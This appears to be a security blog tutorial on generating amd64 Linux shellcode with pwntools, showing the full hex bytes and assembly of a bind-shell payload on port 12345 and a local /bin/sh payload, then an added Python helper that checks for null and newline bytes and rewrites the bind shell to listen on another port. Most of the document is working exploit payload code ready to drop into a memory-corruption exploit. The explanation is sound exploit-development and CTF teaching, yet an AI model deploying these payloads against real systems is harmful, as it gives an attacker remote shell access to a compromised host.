#dokydoky
[Shellcode] Generating shellcode with pwntools
After setting the architecture and OS in context, shellcode can be generated as shown below.
shellcraft.bindsh is shellcode for remotely exploiting a standalone daemon: it creates a listening socket, accepts one connection, and copies the accepted socket onto stdin/stdout/stderr with dup2 before spawning a shell.
shellcraft.sh is shellcode for local exploits or for exploiting a binary managed by xinetd, where fds 0, 1 and 2 are already the client socket, so only an execve of /bin/sh is needed.
(If the standalone vs. xinetd distinction is unclear, see: http://dokydoky.tistory.com/446)
The sessions below were run under Python 2, where asm() returns a str; on Python 3 asm() returns bytes, so iterate over the bytes directly and drop the ord() call.
In [57]: from pwn import *
In [58]: context(arch='amd64', os='linux')
In [59]: print "".join(['\\x{:02X}'.format(ord(i)) for i in asm(shellcraft.bindsh(12345, network='ipv4'))])
\x6A\x29\x58\x6A\x02\x5F\x6A\x01\x5E\x99\x0F\x05\x52\xBA\x01\x01\x01\x01\x81\xF2\x03\x01\x31\x38\x52\x6A\x10\x5A\x48\x89\xC5\x48\x89\xC7\x6A\x31\x58\x48\x89\xE6\x0F\x05\x6A\x32\x58\x48\x89\xEF\x6A\x01\x5E\x0F\x05\x6A\x2B\x58\x48\x89\xEF\x31\xF6\x99\x0F\x05\x48\x89\xC5\x6A\x03\x5E\x48\xFF\xCE\x78\x0B\x56\x6A\x21\x58\x48\x89\xEF\x0F\x05\xEB\xEF\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xD2\x52\x6A\x08\x5A\x48\x01\xE2\x52\x48\x89\xE2\x6A\x68\x48\xB8\x2F\x62\x69\x6E\x2F\x2F\x2F\x73\x50\x6A\x3B\x58\x48\x89\xE7\x48\x89\xD6\x99\x0F\x05
In [60]: print "".join(['\\x{:02X}'.format(ord(i)) for i in asm(shellcraft.sh())])
\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xD2\x52\x6A\x08\x5A\x48\x01\xE2\x52\x48\x89\xE2\x6A\x68\x48\xB8\x2F\x62\x69\x6E\x2F\x2F\x2F\x73\x50\x6A\x3B\x58\x48\x89\xE7\x48\x89\xD6\x99\x0F\x05
The assembly code is shown below. Two things are worth noticing. First, the sockaddr_in is built with "mov edx, 0x1010101 ; xor edx, 0x38310103" rather than a direct "mov edx, 0x39300002", because the direct immediate would contain a zero byte (AF_INET = 0x0002) and break a string-based overflow; the same 0x1010101 XOR trick is used to push 'sh\x00'. Second, the comment pwntools emits for "push 0x10" says sizeof(struct sockaddr_in6), but 0x10 (16) is sizeof(struct sockaddr_in); sockaddr_in6 is 28 bytes, so the value is correct and only the comment is mislabeled. The last part of bindsh, from the dup2 loop onward, is exactly the shellcraft.sh payload.
In [62]: print shellcraft.bindsh(12345, network='ipv4')
/* call socket('AF_INET', 'SOCK_STREAM', 0) */
push (SYS_socket) /* 0x29 */
pop rax
push (AF_INET) /* 2 */
pop rdi
push (SOCK_STREAM) /* 1 */
pop rsi
cdq /* rdx=0 */
syscall
/* Build sockaddr_in structure */
push rdx
mov edx, 0x1010101 /* (AF_INET | (14640 << 16)) == 0x39300002 */
xor edx, 0x38310103
push rdx
/* rdx = sizeof(struct sockaddr_in6) */
push 0x10
pop rdx
/* Save server socket in rbp */
mov rbp, rax
/* call bind('rax', 'rsp', 'rdx') */
mov rdi, rax
push (SYS_bind) /* 0x31 */
pop rax
mov rsi, rsp
syscall
/* call listen('rbp', 1) */
push (SYS_listen) /* 0x32 */
pop rax
mov rdi, rbp
push 1
pop rsi
syscall
/* call accept('rbp', 0, 0) */
push (SYS_accept) /* 0x2b */
pop rax
mov rdi, rbp
xor esi, esi /* 0 */
cdq /* rdx=0 */
syscall
dup_106:
mov rbp, rax
push 3
loop_107:
pop rsi
dec rsi
js after_108
push rsi
/* call dup2('rbp', 'rsi') */
push (SYS_dup2) /* 0x21 */
pop rax
mov rdi, rbp
syscall
jmp loop_107
after_108:
/* push argument array ['sh\x00'] */
/* push 'sh\x00' */
push 0x1010101 ^ 0x6873
xor dword ptr [rsp], 0x1010101
xor edx, edx /* 0 */
push rdx /* null terminate */
push 8
pop rdx
add rdx, rsp
push rdx /* 'sh\x00' */
mov rdx, rsp
/* push '/bin///sh\x00' */
push 0x68
mov rax, 0x732f2f2f6e69622f
push rax
/* call execve('rsp', 'rdx', 0) */
push (SYS_execve) /* 0x3b */
pop rax
mov rdi, rsp
mov rsi, rdx
cdq /* rdx=0 */
syscall
In [63]: print shellcraft.sh()
/* push argument array ['sh\x00'] */
/* push 'sh\x00' */
push 0x1010101 ^ 0x6873
xor dword ptr [rsp], 0x1010101
xor edx, edx /* 0 */
push rdx /* null terminate */
push 8
pop rdx
add rdx, rsp
push rdx /* 'sh\x00' */
mov rdx, rsp
/* push '/bin///sh\x00' */
push 0x68
mov rax, 0x732f2f2f6e69622f
push rax
/* call execve('rsp', 'rdx', 0) */
push (SYS_execve) /* 0x3b */
pop rax
mov rdi, rsp
mov rsi, rdx
cdq /* rdx=0 */
syscall
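The following is an added example, not code from the original post or from pwntools. It takes the two byte strings printed above, parses them back into bytes, checks them for bad bytes, decodes the XOR-encoded sockaddr_in in bindsh to recover the listening port, and rewrites the two immediates to bind to a different port while keeping the payload free of bad bytes. The bad-byte set (0x00, 0x0a, 0x0d) and the helper names are assumptions made for the example; pwntools always picks 0x01010101 as its XOR key, whereas the rewrite below picks each key byte independently so that any port can be encoded. Nothing here executes the shellcode, so it runs on any platform.

```python
import struct

# The two payloads exactly as printed by the page's IPython session (constructed
# here as raw strings so the "\xNN" escapes can be parsed back into bytes).
BINDSH_HEX = r"\x6A\x29\x58\x6A\x02\x5F\x6A\x01\x5E\x99\x0F\x05\x52\xBA\x01\x01\x01\x01\x81\xF2\x03\x01\x31\x38\x52\x6A\x10\x5A\x48\x89\xC5\x48\x89\xC7\x6A\x31\x58\x48\x89\xE6\x0F\x05\x6A\x32\x58\x48\x89\xEF\x6A\x01\x5E\x0F\x05\x6A\x2B\x58\x48\x89\xEF\x31\xF6\x99\x0F\x05\x48\x89\xC5\x6A\x03\x5E\x48\xFF\xCE\x78\x0B\x56\x6A\x21\x58\x48\x89\xEF\x0F\x05\xEB\xEF\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xD2\x52\x6A\x08\x5A\x48\x01\xE2\x52\x48\x89\xE2\x6A\x68\x48\xB8\x2F\x62\x69\x6E\x2F\x2F\x2F\x73\x50\x6A\x3B\x58\x48\x89\xE7\x48\x89\xD6\x99\x0F\x05"
SH_HEX = r"\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xD2\x52\x6A\x08\x5A\x48\x01\xE2\x52\x48\x89\xE2\x6A\x68\x48\xB8\x2F\x62\x69\x6E\x2F\x2F\x2F\x73\x50\x6A\x3B\x58\x48\x89\xE7\x48\x89\xD6\x99\x0F\x05"

AF_INET = 2
# Bytes that usually cannot survive a string-based overflow (assumed set for this example).
BAD_BYTES = frozenset(b"\x00\x0a\x0d")


def unescape(hex_str):
    """Turn a '\\x6A\\x29...' string back into bytes."""
    return bytes(int(tok, 16) for tok in hex_str.split("\\x")[1:])


BINDSH = unescape(BINDSH_HEX)
SH = unescape(SH_HEX)


def bad_bytes(sc, bad=BAD_BYTES):
    """Sorted list of forbidden byte values that occur in sc (empty means clean)."""
    return sorted({b for b in sc if b in bad})


def find_sockaddr_imm(sc):
    """Offset of 'mov edx, imm32' (BA xx xx xx xx) immediately followed by
    'xor edx, imm32' (81 F2 xx xx xx xx), or None if the pattern is absent."""
    for i in range(len(sc) - 10):
        if sc[i] == 0xBA and sc[i + 5:i + 7] == b"\x81\xF2":
            return i
    return None


def decode_bind_port(sc):
    """Recover the listening port from the XOR-encoded sockaddr_in in a bindsh payload."""
    i = find_sockaddr_imm(sc)
    if i is None:
        raise ValueError("no mov/xor sockaddr_in sequence found")
    mov_imm = struct.unpack("<I", sc[i + 1:i + 5])[0]
    xor_imm = struct.unpack("<I", sc[i + 7:i + 11])[0]
    # edx after the xor is pushed as-is, so re-serialise it the way it lands on the stack.
    sockaddr = struct.pack("<I", mov_imm ^ xor_imm)
    family = struct.unpack("<H", sockaddr[:2])[0]   # sin_family, host order
    port = struct.unpack(">H", sockaddr[2:4])[0]    # sin_port, network order
    if family != AF_INET:
        raise ValueError("unexpected sin_family %d" % family)
    return port


def retarget_port(sc, port, bad=BAD_BYTES):
    """Rewrite the two immediates so the payload binds to `port`, keeping both imm32
    values free of bad bytes. XOR is bytewise, so each key byte is chosen on its own."""
    if not 1 <= port <= 65535:
        raise ValueError("port out of range")
    i = find_sockaddr_imm(sc)
    if i is None:
        raise ValueError("no mov/xor sockaddr_in sequence found")
    target = struct.pack("<H", AF_INET) + struct.pack(">H", port)
    key = bytearray()
    for t in target:
        # A key byte that is itself clean and whose XOR with the target byte is clean.
        key.append(next(k for k in range(1, 256) if k not in bad and (k ^ t) not in bad))
    enc = bytes(k ^ t for k, t in zip(key, target))
    return sc[:i + 1] + bytes(key) + sc[i + 5:i + 7] + enc + sc[i + 11:]


if __name__ == "__main__":
    print("bindsh listens on port", decode_bind_port(BINDSH))
    print("bad bytes in bindsh:", bad_bytes(BINDSH), "in sh:", bad_bytes(SH))
    print("sh is the tail of bindsh:", BINDSH.endswith(SH))
    moved = retarget_port(BINDSH, 4444)
    print("retargeted to port", decode_bind_port(moved), "bad bytes:", bad_bytes(moved))
```

Port 257 (0x0101) is the edge case that motivates the per-byte key choice: XORing 0x01 with pwntools' fixed 0x01 key byte would produce a zero, so a fixed key cannot encode every port without introducing a null.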